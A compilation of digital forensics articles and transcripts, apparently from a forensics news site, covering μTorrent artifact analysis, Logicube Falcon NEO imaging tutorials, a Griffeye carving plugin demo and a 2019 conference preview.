by Angus M. Marshall & Richard Paige

Abstract

During a project to examine the potential usefulness of evidence of tool verification as part of method validation for ISO 17025 accreditation, the authors have examined requirements statements in several digital forensic method descriptions and tools. They have identified that there is an absence of clear requirements statements in the methods and a reluctance or inability to disclose requirements on the part of tool producers. This leads to a break in evidence of correctness for both tools and methods, resulting in incomplete validation. They compare the digital forensics situation with other ISO 17025 accredited organisations, both forensic and non-forensic, and propose a means to close the gap and improve validation. They also review existing projects which may assist with their proposed solution.

Read the full paper on ResearchGate.

by Michael R. Godfrey

The μTorrent software client is the most popular BitTorrent peer-to-peer software application worldwide [1]. Contraband files such as copyrighted movies and music, child pornography and pirated content, are frequently acquired through the peer-to-peer (P2P) file sharing protocol BitTorrent. This research will include the digital forensic analysis of the μTorrent client, specifically, the free (Basic) version 3.5.3 for Windows released on utorrent.com. The μTorrent client is based on the same architecture of the original, less popular client, itself named BitTorrent (bittorrent.com). In fact both software applications are owned by BitTorrent, Inc. [2] Although the same artifacts have been identified in all versions of μTorrent, any examination of other versions should be tested by the examiner.

μTorrent is available for Windows, Mac, Linux, Android, and iOS (only with a jailbroken device). A computer running μTorrent can be paired with external devices for viewing (iOS and Android mobile devices, USB storage drives, and certain streaming devices)[3].

A user can remotely and securely manage μTorrent running on a computer. Their μTorrent client can then be accessed from another computer or mobile device equipped with a web browser [4].

BitTorrent uses trackers to allow clients to find peers, known as seeds. Rather than downloading a file from a single source (node), the BitTorrent protocol allows users to join a swarm of hosts to upload and download content from each other. A seed is a node that possesses an entire file being distributed. A user who wants to distribute a file must first create a small torrent descriptor file that contains only metadata and has a .torrent file extension. The .torrent files are distributed through one or more Torrent websites, called an Indexer, that allows users to search for particular content and download applicable .torrent files. The .torrent files include specific tracker information. A tracker is a server that keeps track of what peers and seeds have the pieces of the files to be distributed. The creation of the distributed hash table (DHT) method for “trackerless” torrents make the trackers redundant [5].

Users with the .torrent file loaded into their BitTorrent client can establish connections among other BitTorrent nodes (peers or seeds) via the DHT communications feature of BitTorrent. The file being distributed is divided into segments (pieces), as each new peer receives a new piece, that peer now becomes a distributor of that piece. Every piece is protected by a cryptographic hash (SHA1). The BitTorrent client will identify what pieces are needed in order to obtain a complete file. Once a peer has downloaded a complete file, it then becomes a distribution seed.

BitTorrent does not ensure the anonymity of its participants. The IP of connected peers can be readily identified through the client user interface or via the netstat Windows command that will display the connected peers and seeds. The standard ports for BitTorrent, including the μTorrent client, are TCP/UDP ports 6881-6889 (6969 for the tracker port).

The μTorrent Client

The default installation will place all files for the μTorrent client in the user’s application data directory as follows:
C:\Users\<User_Name>\AppData\Roaming\uTorrent\

The following configuration files include relevant information regarding application setting and history:

• resume.dat
• settings.dat
• dht.dat (distributed hash table)
• rss.dat

If the client is shut down, the above DAT files are backed up and .old is appended as the new file extension. The below graphics are of the μTorrent directory following a fresh installation in Windows 10. After installation but prior to launching the application is shown on the left. On the right is the application files after first launch of μTorrent, adding TEST.torrent to the client, then shutting it down.

BEncode Editor

The DAT files and .torrent files are written in BEncode. Therefore, to view the contents, a tool capable of decoding BEncode files must be used, such as BEncode Editor.

When viewing these files in the BEncode Editor, data will appear with an indicator showing the data type adjacent to each heading:

• Byte strings: (b)
• Integers: (i) (base 10 ASCII characters)
• Lists: (l)
• Dictionaries: (d)

A number surrounded by brackets: [48], will represent a quantity based on the data type (byte string, integer, list or dictionary):

• Byte strings: number of bytes or characters
• Integers: number of digits
• Lists and Dictionaries: number of items in the list or dictionary

Below is the contents of a settings.dat file viewed with BEncode Editor.

μTorrent DAT Files

settings.dat

Contains settings and configuration data

• autostart=: 0=OFF, otherwise there will be no entry
• ct_hist [#]: Number of .torrent files created by this client (within brackets), includes path and name of files/folders that the user used to create the .torrent file; good indicator of knowledge and intent; may point to external media or other storage drive/directory locations
• born_on=13036184115: Lightweight Directory Access Protocol (LDAP) time, or FILETIME, number of 100 nanosecond intervals since 1 Jan 1601 UTC – must add 7 trailing zeroes in EpochConverter
• devices: Paired devices will be listed here with device name, USB VID&PID and serial number
  • auto_transfer=: 0=OFF/1=ON
  • usb_id: contains the USB device vendor ID (VID) and product ID (PID), along with USB device electronic serial number and possibly the device friendly name

The graphic below shows the μTorrent Devices interface with two devices connected: iPhone/iPod and Apple iPhone 3GS.

dir_last entry is the directory selected by the user to download a Torrent file when the user added the associated .torrent file and selecting the “choose save dir” option (see below graphic). The dir_last entry is updated for each new .torrent file added in this manner.

• *dir_active_download: Location set by user to save new downloads
• *dir_autoload: Location set by user to autoload Torrent files
• *dir_completed_torrents: Location set by user to store completed downloads
• *dir_completed_torrents: Location set by user to archive completed .torrent files
• *dir_torrent_files: Location set by user to store torrent files downloaded by the client

(*) The above settings will be present only if the user changed the default location for that particular directory using the Preferences menu (see below image), otherwise no entry will be present.

• runs_since_born: Number of times the program started and closed since install
• runtime_since_born_secs: Number of seconds the program has run
• search_list: List of Torrent search sites used in the μTorrent toolbar, can be added by the user, results in user’s web browser loading the search site so check Internet History
• settings_saved_systime: Last time client settings were changed, UNIX time

Remote Access

A system configured for Remote Access will allow a user to control the uTorrent client running on the remote system using a web interface. To initiate Remote Access, the user will navigate to https://remote.utorrent.com and enter the previously configured computer name and password. After authenticating, the user is presented with a web interface that appears nearly identical to the uTorrent client status on the remote system. The below image depicts the Remote Access web interface (top) and the actual uTorrent client (bottom).

Below are the more relevant entries in settings.dat that will be present if the client is set to be operated via
Remote Access connection using the Preferences > Remote menu settings. A unique name must be provided and
any password will be accepted. The below image shows the Remote Access setting enabled:

• upnp.external_ip: Last external (routable) IP of the computer the client is installed on will be stored here; see image below
• upnp_cached_host: Universal plug and play(upnp) URL of the IGDdevicedesc.xml file on the local network; will include the local network gateway IP and port; used to facilitate network connectivity

• upnp.external_ip: External (routable) IP of the computer that the client is installed on
• webui.ssdp_uuid: Universal unique identifier (last 6 characters represent the MAC address of the network interface)
• webui.ucinnect_hashword: Salted SHA-1 hash of the login password for Remote Access
• webui.ucinnect_username: Name of the computer assigned by the user in Preferences > Remote

resume.dat

Stores status info when client is shut down

• added_on=: Time Torrent was added to the client (UNIX time)
• completed_on=: Time Torrent was completely downloaded or created (UNIX time)
• created_torrent=: 1=client created torrent, 0=client did not create torrent
• download_url=: If client used ‘add torrent from URL’ function
• downloaded=: Bytes of the file downloaded so far
• last_seen_complete=: Last time client was seeding the complete file (UNIX time)
• last_active=: Last time the file was being seeded or shared by this client (UNIX time)
• path[##]=: Path where incoming files are saved, number of files for this Torrent in brackets
• runtime=: Time file has been downloading in the client (or seeding time following download)
• seedtime=: Seconds that client has been seeding file
• started=: File status when client last exited (0=stopped, 1=force started, 2=started, 3=running/not downloading)
• uploaded=: Total uploaded (shared) bytes of data for that specific file
• uploaded=: Total uploaded (shared) bytes of data for that specific file
• peers6 [##]=: IP and Port of peers sharing this file at time client exited (includes the client’s local and external IP, both IPv4 and IPv6), see below for the procedure to convert the data to identify the IP addresses.

Use the following procedure to view the IP address of each Peer:

o The peers6 field of the resume.dat file contains the IP addresses of each peer the client is communicating with in order to participate in the sharing of content via the BitTorrent protocol.
o In the peers6 field of the resume.dat file, select display options to “Raw BEncoded Data” and “as Binary.”
o Convert from Hex to Decimal to get the IP.
o The last 4 hex characters represent the port (Big Endian).
o Follow the below steps to translate the data in order to identify the IP address of each peer.

Open the data field adjacent to the peers6 entry:

Copy and paste this hex data into Notepad++ and create a new line with 36 characters each. Each line will display the IPv6 (all zeros if no IPv6 is present), followed by IPv6 port (FFFF if no IPv6), followed by the IPv4 (8 characters) and the IPv4 port (4 characters):

Byte string (36 characters): 00000000000000000000FFFFC0A80177B0E3

IPv4 IP and Port: FFFFC0A80177B0E3
IPv4 address (convert from hex to decimal):

C0A80177:E3B0
C0=192
A8=168
01=1
77=119

Port (Little Endian): E3B0=58,288 (port)
Converted: 192.168.1.119:58288

dht.dat

Contains data used by the client when connecting to the Distributed Hash Table (DHT) network for sharing contact information, so users engaged in downloading the same file(s) can discover each other. This file also stores the client’s outwardly facing IP address. This is a useful artifact as most Windows artifacts only store the local, non-routable IP address. Be sure and review dht.dat.old as this is the previous version of the file from the last shutdown of the μTorrent client for this user.

age: Time last updated, or when client shut down (UNIX decimal), good indicator of associating the client’s IP to a date/time.
ip: Represents the client’s routable IP address in hex (assigned by the client’s service provider), follow the below steps to translate the data to identify the outwardly facing client IP.

Double click the text data to the right (below example: G>#!):

Select display options: “Raw BEncoded Data” and “as Binary”:

Convert hex to decimal:

47=71
3E=62
23=35
21=33

Converted IP: 71.62.35.33

In the above test example, visiting the website www.whatismyipaddress.com disclosed the correctly translated IP address, rather than just the local IP, of the test Windows computer system.

nodes: Contains the IP addresses (IPv6 and IPv4) of each peer the client is communicating with in order to participate in the sharing of content via the BitTorrent protocol. To convert the data, follow the steps below.

• 26-byte (52 hex digits):

To determine the total number of peers that the client is communicating with, divide the number in brackets (10036, in the example below) by 26 (hex bytes in the string) to determine the total number of IP addresses contained in the data (386 IPs in the example below) – display Type “Binary / as Binary” as depicted below.

• id (b)[20]=: Contains the unique ID of the client’s node, 20 hex character pairs. To display the data, select: “Raw BEncoded Data” and “as Binary”:

Torrent files

To distribute files using the BitTorrent protocol, a .torrent file will need to be created and seeded. In the client, .torrent files can be created using the following procedure.

• In μTorrent, select FILE  Create Torrent

• Select either a single file, or the contents of a directory containing the files that will be associated with the torrent file
• Add or change the torrent tracker URL information
• Add any comments regarding the torrent contents as desired
• Check Start seeding
• Select Create
• Provide a name for the torrent file, and be sure the file type is Torrent files:

A BEncode viewer (BEncode Editor) is necessary to view the content of a .torrent file.

• announce: URL of the tracker site
• announce-list: A new key, contains a list of URLs of all trackers for this torrent

o Tiers of announces will be processed sequentially
o All URLs in each tier must be checked before the client goes on to the next tier
o The first successful connection with a tracker will cause it to be moved to the front of the tier

• info: Contains an entry for each file that is included in the torrent:
  • ITEM 1 (d)[n]: Indicates which file by number, with the number in brackets referring to the
    number of items contained in this section (2)
  • length (i)=: Number of bytes of the file
  • path (i)[n]: Name of the file
  • name (b)[n]=: Name of the torrent (not to be confused with the name of the .torrent file itself)
  • piece length (i)=: The number of bytes that each piece of the torrent file was split into, arrived at by adding all of the file sizes, and dividing this number by 2,040
  • pieces (b)[n]: Includes the complete SHA1 characters of all pieces strung together, n = total bytes of SHA1 concatenated hashes

The below graphic explains the contents of the info section of a torrent file. Each file is combined into one stream, then split into fixed piece lengths for efficient transfer using the BitTorrent protocol.

Once a .torrent file has been generated, it will need to be seeded so that others can locate the file based on a search using keywords. The below image displays the Info tab of TEST.torrent showing that there is one member of the swarm with one peer connected (both are the test client), and the content is included in 33 pieces, each 1 MB in size. TEST.torrent was created by μTorrent v 3.5.3 at 14:15:01, 2 Mar 18.

μTorrent statistics

In μTorrent, select Help –> Show Statistics

The entire μTorrent directory from the suspect’s system can be exported, and installed in test VM having the same OS in order to emulate (view) the suspect’s μTorrent state at time of last shutdown:

Install same version of μTorrent on the destination system first (look for the .exe file in the updates folder for the version installed). Note that this ‘emulation’ will increment the statistics to include your testing (e.g., program launch time +1), so use VM snapshots and restore as needed.

μTorrent Search Tool

In μTorrent, users can search for content and torrent file indexer site results will display. The search activity will be captured in Web History as it uses the default browser to run the searches.

μTorrent Windows Registry Artifacts

The following Windows Registry entries are associated with the installation and use of μTorrent:
ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Uninstall\uTorrent

ntuser.dat\Software\BitTorrent\uTorrent

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ FileExts\.torrent\OpenWithList

• Will show which BitTorrent client type was preferred if multiple clients have been installed (and when)
• Value = letter representing the order of assigned programs

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ RecentDocs\.torrent
– Shows recent Torrent files accessed

ntuser.dat\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\ OpenSavePidlMRU\torrent
– Shows Torrent files opened or saved via the Windows dialog shell

usrclass.dat\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
– When an applications is executed, Windows retrieves the application name and stores it
– Shows applications that have been executed

Using Notepad++

Notepad++ can be used to assist in translating the raw data retrieved from the encoded data stored in the DAT files or torrent files.

To force a string into new lines after every nth character:

• Copy and paste data to Notepad++
• Remove any leading ‘x0’ in byte string data)
• Select CTRL+H to enter the find and replace menu
• Enter: ^.{n} in ‘Find what’
• Enter: $0\r\n in ‘Replace with’
• Replace the {n} with the number of characters before each line (in the below example, {20} is used)
  o Use 36 for peers6 (resume.dat) – IP/Port
  o Use 52 for nodes (dht.dat) – Node ID/IP/Port
  o Use 40 for pieces (.torrent files) – SHA1 characters
• Select Regular expression
• Results can then be copied to Excel

About The Author

Michael Godfrey is a Senior Digital Forensics Examiner for ManTech International and was previously a Special Agent for Homeland Security Investigations assigned to the DHS Cyber Crimes Center in Fairfax VA. 

[1] Alan Henry, Most Popular BiTorrent Client: μTorrent; https://lifehacker.com/5813348/five-best-bittorrent-applications/1705622513 (May 2015)
[2] Ernesto, BitTorent Inc Buys uTorrent, https://torrentfreak.com/bittorrent-inc-buys-%C2%B5torrent/ (Dec 2006)
[3] Lauren Hockenson, μTorrent Pro Tips: How to Pair Your Android Device, http://blog.utorrent.com/2015/02/20/%CE%BCtorrent-pro-tips-how-to-pair-your-android-device
[4] μTorrent Remote; https://www.utorrent.com/remote
[5] Ben Jones, https://torrentfreak.com/common-bittorrent-dht-myths-091024 (Oct 2009)

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this episode, we’ll show you how to perform a logical image.

The logical imaging feature of Falcon NEO shortens the evidence collection process by allowing investigators to select and acquire only the specific files they need, rather than the entire physical drive. Users can create logical images from source drives locally attached to the Falcon NEO, or from a network repository.

To perform a logical image, we’ll choose the Mode icon and select ‘File to File’. Choose the source drive – we’ll choose S1 – and then choose the Settings icon. Under the Settings icon you can add case information by clicking on the Case Info icon. So you can add a case filename, case ID, examiner, case notes, whatever you like.

Then we’re going to select the Root Directory icon. In this screen, the top-level directory can be set. All searches will start from this directory. The root directory can be entered manually, or you can browse the selected source drive by clicking on the Folder icon. And here you can see that there are two partitions in this source drive; we’re going to go ahead and select the one named ‘Partition 2’. And you can scroll through the contents by using the slider on the right-hand side. We’re going to go ahead and select ‘Demo Folder’, click ‘OK’.

Next we’re going to select the output format. Here your choices are a directory tree format, so the results will be written in a directory tree format and all files will appear in the same directory structure as found on the source drive. An L01 or LX01 Archive, which is a logical evidence file format that can be used with a variety of forensic software tools; a zip archive; or an MFT report. In this case all results will list deleted files, if they’re present, that can potentially be restored or recovered.

We’re going to select ‘Directory Tree.’ Next we’ll move on to the filter settings. There are three choices: a Path Filter, Signature-Based File Categories, and/or Keywords. We’re going to start with Path Filter, and you’ll see there are two options: Preset and Custom Filter. Under Preset you’ll see there are things like ‘Include all user directories’, ‘exclude all program directories’; all of these are set to ‘no’ as default and we’re going to keep that default.

We move on to custom filter. The Falcon NEO uses POSIX extended regular expressions for the syntax of the filter. This is simply a special text strain for describing a search pattern. More information regarding POSIX can be found in the Falcon NEO users’ manual.

If we wanted to filter file names to a single keyword, we could enter period, asterisk, parentheses, and the word we wanted to search on, and close parentheses. In this case I’ve used the word ‘taliban’ so that it will search for any file names that include the word ‘taliban’. So taliban.jpg, taliban.txt, taliban.png. You could have multiple keywords by separating each keyword with a straight line within the parentheses, so for example I could add a straight line here and then add another word, for example ‘b-o-m-b’, and so now the custom filter will show any file name that included ‘taliban’ or ‘bomb’; bomb.png for example, it would search for that.

For this exercise, what I want to do is to search for file extensions, so for this type of filter we need to add a backslash to the end of the syntax. So we’re going to go ahead and add a backslash here, then a period, and in this case I’m going to add an extension for ‘pdf’, so for this search we’re going to look for any file names that have the extension ‘.pdf’. Click OK.

Next we’re going to choose the signature-based file categories. Here you can choose documents, audio, images, video, or archives. In this case we’re just going to look for documents.

And the next method of filtering is keywords. Here you can set specific keywords to search for within the results of the first two filters. Note that the keyword is searched within the content of a file, not on the name of the file. We’re also going to ignore the case, so it will ignore whether it is upper case or lower case, and we’re going to add the word ‘falcon’ as a keyword that we want to search on.

Each filter narrows down the results from the previous filter. Setting a custom path filter, all files with the extension ‘pdf’, then select ‘Documents’ as the signature-based file category, [this] will narrow down the results of the path filter to only document files with the extension .pdf, if you add a keyword such as ‘falcon’ under Keyword Filtering it will narrow the search to documents with a file extension .pdf and whose contents contain the keyword ‘falcon’. Setting the filter too narrowly may adversely affect your results.

Next you can select the hash verification method. In this case we’re going to choose SHA-1, and verify is ‘Yes’. Click ‘OK’, we’ll then select the destination; in this case we’re going to select D3. Once you have all of your settings done and you’ve selected your source and your image file, just press ‘Start’. You’ll get a prompt, click ‘Yes’, and as you can see there’s a progress bar that will appear and it will show you the number of files that were captured, the speed, etc.

If we move to the logs and view the log file for this capture, you’re going to see under the operation parameters the search root path is ‘demo’, the format was ‘directory tree’, the path format was ‘.pdf’, we’re searching under ‘Documents’ and with a keyword ‘falcon’. OK.

And if you’ll scroll down, you’ll see the results of the logical image and it will show you there are four files that were found, we’ll see the hash as well and all of these documents are PDF, and all of them included the word ‘falcon’ in their content. You can close that out.

As drive sizes grow, it may be inefficient to image an entire drive. Logical imaging allows investigators to quickly zero in on relevant files and streamline the acquisition process.

We hope you found this tutorial of interest. To learn more about the Falcon NEO, please visit our website at logicube.com or contact our sales team at sales@logicube.com.

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session, we’ll show you how to use the file browser feature.

The file browser feature of the Falcon NEO provides logical access to source and destination drives connected to the Falcon NEO. To open the file browser, click on the left-hand menu and click on the File Browser icon. The browser can be used directly on the Falcon NEO’s display, which can be useful when you’re out in the field and there are no computers available; or the browser can be used from the web interface, as we’ve done here.

The file browser can open several types of image files, including jpeg, png, gif, and can also open text, HTML and PDF type files. Using the web interface on a PC also gives you the ability to download files to that same PC and then preview any files that cannot be previewed on Falcon NEO.

To select the drive to browse, tap at the top of the screen; you’ll see these tabs that show all of the drives connected to the Falcon NEO. Both source and destination drives, if the destination drive was formatted by Falcon NEO, will be displayed. Drives connected to the source position are write-protected, and opening a file using the Falcon NEO’s display interface, or when using a web browser on a PC, or when using a computer, will not alter the forensic integrity of the source drive connected to Falcon NEO.

The file browser will show all of the partitions that can be read. We’re going to go ahead and select partition two. And using the scrollbar on the right-hand side you can scroll through all of the folders that are available here. We’re going to click on Demo; you can see we have Documents, Photos, Videos; I’ll click on Photos and again you can use the scrollbar on the right to scroll through all of the photos that are available here. We’ll go ahead and click on a couple of these, and you can see the photo pops up here; we’ll click on a second one, and again the photo will show up here.

If we scroll back up to Documents, you can see that there’s a PDF file here; we’ll click on that, and again we can see that pops up, you can scroll through it.

If there is a particular file that is not viewable on the Falcon NEO, for example this .doc or document file, when you click on it you’re going to see an error message that says “File viewer cannot view file type”. If you are using the web browser on a PC, if you right-click that file and then click on ‘Save link as…’, you can save that file to the desktop of your computer so that you can view it at a later point.

The file browser feature helps streamline the evidence collection process. When faced with large volumes of suspect drives, the ability to preview and triage drive contents can be extremely beneficial. Investigators can prioritise drives based on content, for imaging now or at a later time.

We hope you found this tutorial of interest. To learn more about the Falcon NEO please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

Let’s talk about the exciting new LACE Carver Integration with Analyze DI Pro. Once you have the proper license, you can head over to your Downloads page on MyGriffeye.com and go to the LACE Carver download. Once the app package has been downloaded, we can go back to Griffeye and install it under Settings, Plugins, and click on the Install button, selecting the file we just downloaded from the internet.

Once the file is fully extracted and the plugin has been installed, you can head over to the Analyze Forensic Marketplace, where we now have LACE Carver integration. If you click on it, you can get Introduction, Installation information, and how to use it as well.

Now let’s create a new and check out the additional processing features available to us with the LACE Carver integration. The first thing you’ll notice is we have an additional selection, Physical Media. The LACE Carver integration allows Griffeye Analyze DI to point directly to a physically connected device.

Notice that when we select the device, we can either look at it on the physical level or the logical level, whichever you prefer. None of my physically connected devices are right-locked, so I’m going to use a forensic image file that I’ve already created.

Once I select the image file, notice it gives me additional options on how to process this forensic image. If I select Import Forensic Image, I get the standard Analyze DI Import, which does not get unallocated files. But if I select Carve Forensic Image with Lace, it handles the entire processing of the EO1 file to include valid files and unallocated [01:54] files. It also gives me several carving options and an Advanced button if I want to further refine what I’m looking for – it could be images, videos, documents, deleted files, unallocated files, and some other file formats.

Because we chose the integrated Lace Carver to handle the forensic image file import, there’s no need to bring in an additional folder containing carved unallocated files. It’s all contained in the same source ID in this investigation. So, we can continue to process our case as we normally would. The Integrated LACE Carver will begin to carve the forensic image. Now, remember, this is getting valid files as well as deleted and unallocated files. Once the LACE Carver has completed processing the forensic image file, the results will be imported into the Griffeye case, as it normally would. Using the Integrated LACE Carver to process our forensic image, we found 33,804 files as a part of our investigation.

Now let’s take a look at a case I created using the same forensic image file, but selecting the standard import, not using the LACE Carver. I was only able to find 1,893 files in that forensic image. Now let’s take a look at the information we have within the case, about our files. In the grid view, the unallocated column now contains checkboxes on all the files that were found in unallocated space, as well as the physical file location or physical sector where that file was found. We also now have the ability to filter files that we found in unallocated space by going over to our filters, the File tab, and to the unallocated filter, and select Is Unallocated, and now we filter down to just the files we’ve found in unallocated space.

Thanks for watching. If you have any questions or comments, hit us up in the forms or send an email to support@griffeye.com.

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session we’ll show you how to multitask.

For this tutorial I have connected the Falcon NEO to a network, and from a PC on the same network I’ve logged into the unit using a web browser so that I can operate remotely. I’ve already started an imaging task, and we can easily add more tasks and start them simultaneously, streamlining the evidence collection process.

The Falcon NEO supports a total of up to five tasks of each operation type. To set a second, third or even fourth imaging task, click on the upper right icon ‘Add New Task’. A tab will pop up. Click on that tab and you’ll see that all of the icons for settings and mode and source and destination will appear in the centre of the screen.

We’ll click on ‘Mode’, and for this task I’m going to choose ‘Drive To Drive’, which is a bit-for-bit copy of the source drive. I’ll click on ‘Source’, we’re going to choose the PCIE drive in S1. Click ‘OK’. Our settings: we’ll maintain the 100% clone.

Case information: you can add case information here, and all of this information will then appear on the log file for this particular task. We’ll keep the defaults for HPA and DCO, which means that they are unlocked and available to clone. For air handling, we’ll choose ‘Skip’, and for air granularity we’ll choose ‘One Sector’, and for reverse read, we’ll choose ‘No’.

For your hash verification in this case, with this clone, I will choose none, and have no verify. Click ‘OK’. ‘OK’ again. And then select your destination drive. In this case I’ll select D1. All drives that are connected to the Falcon NEO destination side will appear in this list.

Once you have all of your settings completed, just press ‘Start’. A confirmation prompt will appear; click ‘Yes’, and now we have a second imaging task running. I can add a third task, again the tab will pop up, click on that, select your mode – in this case we’ll use our default, Drive To File. For our source drive I’m going to choose S1, click ‘OK’. For settings we’ll use the default settings, so E01, hash method SHA-1, click ‘OK’, choose the destination: in this case I’m going to choose D1. Click ‘OK’ and just press ‘Start’.

And again, a progress bar will appear. We have three imaging tasks running. And in the upper left-hand corner at the top of the screen, you’ll see icons for each of the tasks that are running on the Falcon NEO. And these will fill in with green areas as the tasks proceed.

We can now add a Wipe / Format task if we wanted to. So again, [from] the icons in the middle of the screen, choose a destination. In this case we’re going to choose D4. Click ‘OK’. For settings we’re going to choose Secure Erase, because I know that this drive does support secure erase. If it did not, we could choose to use a wipe pattern – it could be a seven-pass wipe, or a custom wipe with a custom number of passes.

We want to have this drive formatted, so we’re going to click on ‘Settings’. Click ‘On’. And then choose the file system – in this case we’re going to choose NTFS, but you can choose EXT4, EXFAT or FAT32. You could also choose to have the destination drive encrypted; in this case we’re clicking ‘Off’. Click ‘OK’. ‘OK’ again. You could also add case information if you wanted to.

We’ll click ‘Start’, and now you’ll see ‘W’ has been added to this upper area here, showing that there is a wipe task.

You can add a second wipe task if you wanted by clicking on ‘Add’; we could also add a hash verify task if we wanted to. The mode in this case is either drive hash or case verify; we’ll choose case verify. Click ‘OK’.

We’ll choose the case, which would be on D3. Click ‘OK’. You’ll see that there is a case here – E01 Capture – we’re going to select that, click ‘OK’. Your settings will be to verify the primary hash. You could add case information if you wanted to. We’ll click ‘Start’, click ‘Yes’, and now we have a hash task running.

Again, all of the information appears up here, just see all of the tasks that are running. If you go back to imaging you can toggle between each of the tasks to see the full progress of that particular task, for example in image 1 we’re about 64% done. It is showing the number of bytes being processed. In this case you’ll see even though this is a 1 TB drive, it is showing 2 TB being processed because we’ve chosen ‘Verify’. The speed for this particular task is running at 48.5; that’ll increase as the drive continues to be processed. The elapsed time will be shown as well as the remaining time for this particular task to be finished.

We hope you found this tutorial of interest. To learn more about the Falcon NEO please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session, we’ll conduct a product tour, including all of the various ports available, and show you how hard drives are connected to the Falcon NEO.

At the front of the Falcon NEO you will find two USB 3.0 ports that can be used as destination ports. On the top of the unit is the touchscreen display. On the rear of the Falcon NEO you will find two power points; two fans; two network ports; and an HDMI port.

On the left, or Source, side of the Falcon NEO you will find two SAS / SATA ports, one USB 3.0 port, and one PCIE port. All ports on the Source side of Falcon NEO are write-protected.

On the right side, or Destination side, of Falcon NEO, you will find two SAS / SATA, two SATA, one USB 3.0, and one PCIE port.

It’s easy to connect hard drives to the Falcon NEO. Here we have connected one SATA suspect SSD to the Source, or write-protected, side of the Falcon NEO; and one SATA SSD to the Destination side of Falcon NEO.

You can continue to add hard drives to both the Source and Destination sides of Falcon NEO. The NEO supports four source drives and eight destinations.

We’ve now added a second SATA drive to the Source port of the Falcon NEO, and we’ve also added a second SATA drive to the Destination side of the Falcon NEO.

Here we’ve added a USB enclosure to the Source side of the Falcon NEO, and a third SATA drive to the Destination side.

Continuing on, we’ve added a PCIE M.2 drive to the PCIE source port and a fourth SATA drive to the destination SATA port.

Now that we have all four Source ports populated, we’ll continue to add drives to the Destination side of Falcon NEO. Here we’ve connected a USB enclosure to the USB 3.0 port on the Destination side.

A PCIE drive is now connected to the PCIE port on the Destination side of Falcon NEO. A seventh drive, a USB flash drive, is now added to the front destination USB 3.0 port.

Now we’ve added a final eighth drive: a USB flash drive to the second destination USB 3.0 port on the front of the Falcon NEO. All USB ports on the Falcon NEO can be converted to SATA using a USB-to-SATA adaptor.

The Falcon NEO now has a full complement of drives connected: four source drives and eight destinations.

Using the Falcon NEO you can image from four source drives to eight destinations simultaneously. You can easily set up imaging tasks, wipe tasks and hash tasks to all run concurrently directly from the user interface on the Falcon NEO display, or by using a web browser and a PC, operate the Falcon NEO remotely, as seen here.

The Falcon NEO can reach speeds of 50 gigabytes a minute for one-to-one imaging.

We hope you found this tutorial of interest. To learn more about the Falcon NEO, please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

From the 11th to the 13th of March 2019, Forensic Focus will be attending the Techno Security & Digital Forensics Conference in San Diego, CA, USA. If there are any topics you’d particularly like us to cover, or any speakers you think we should interview, please let us know in the comments.

Below is an overview of the subjects and speakers that will be featured at Techno Security. The conference has four tracks: audit / risk management; forensics; information security; and investigations, along with sponsor demos. Forensic Focus will be concentrating on the digital forensics track throughout the event.

Monday March 11th

The first forensics talk of the conference will be given by Jimmy Schroering from DME Forensics, who will talk through some case studies of advanced DVR analysis. At the same time, Yulia Samoteykina and Vitaliy Mokosiy from Atola Technology will discuss how the need for rapid triage and extraction can be a challenge for digital forensic evidence acquisition. Meanwhile in the security track, Michael Prins from HackerOne will talk about how to leverage relationships with ‘friendly’ hackers who are willing to help companies to improve their security.

Directly following this, Angel Grant will discuss how a better understanding of the cultural elements of hacking can improve cyber investigations. Vico Marziale from BlackBag will talk about how much has changed in Windows 10, and what forensic investigators need to know when they encounter Windows 10 in their cases. Michael Riedijck from PageFreezer Software will discuss social media evidence collection and how it can be used for ediscovery. Both Oxygen Forensics and Susteen will be giving demonstrations of their forensic solutions at the same time.

The penultimate session of day one will see MSAB’s James Eichbaum talking about mobile application analysis and demonstrating how to manually investigate app data and SQLite databases. There will also be a law enforcement panel happening at the same time, the exact nature of which will be confirmed at a later date. Demos from 2:45-3:45pm will be available from Hawk Analytics and Magnet Forensics.

Keith Leavitt from Cellebrite will be the final speaker in the digital forensics track on Monday, looking at mobile evidence in P2P investigations. Meanwhile Don Brister from Berla will talk through some examples of vehicle forensics, and Richard Gurecki will show attendees how to extract data from water damaged devices, focusing on iPhones and Android phones. An IoT panel will convene at 4pm, discussing how to tackle a data breach, and Arman Gungor from Metaspike will demonstrate how to leverage server metadata in email investigations.

Tuesday March 12th

Tuesday’s sessions will begin at 9:30am with the intriguingly named ‘1+1 Is Not Always 2’, which will look at how to bypass multi-factor authentication. Meanwhile Keith Leavitt will take to the stage again to demonstrate some advanced techniques for mobile analysis. A panel will convene in the Grande E room to discuss the challenge of impermanence in forensic analysis and ediscovery, and what happens when we collect ephemeral evidence from messaging services, social networks and similar media. From 9:30 attendees will also have the chance to see demos from BlackBag Technologies and Truxton Forensics.

The next session’s demos will be from Magnet Forensics and Oxygen. Alongside these, Jason Hale from One Source Discovery will talk about how to improve USB device forensics, and Kirby Plessas will show us how to use open source intelligence techniques for cryptocurrency attribution.

The excellent Women In Cyber panel will be returning after lunch, to discuss some of the challenges faced by women in the industry and how they can be addressed. Meanwhile Jessica Hyde from Magnet will be talking about how to handle IoT evidence more effectively, and Julie Lewis from Digital Mountain will demonstrate how to extract and analyse digital evidence from social networking sites and smartphone applications. MSAB’s Global Training Manager will talk attendees through XAMN and XEC Director, showing how they can save time and speed up investigations.

Eric Schmidt from the CATCH Task Force will show attendees how to think outside the box when conducting OSINT investigations, and Kathy Helenek will demonstrate the effective analysis of cloud storage services. Two speakers from Nike’s forensics department will tackle the popular topic of lab accreditation and explain how to make it work.

In the last session of the day, Mike Melson and Nick Barker from Hawk Analytics will talk about how to testify on cell data records, which can be a tricky subject to discuss in court. Steven Watson from VTO Labs will talk us through some case studies of drone forensic investigations, and discuss some current challenges, while in the Canyon room Richard Spradley will demonstrate Whooster’s ability to bring back accurate and useful real-time investigative data results.

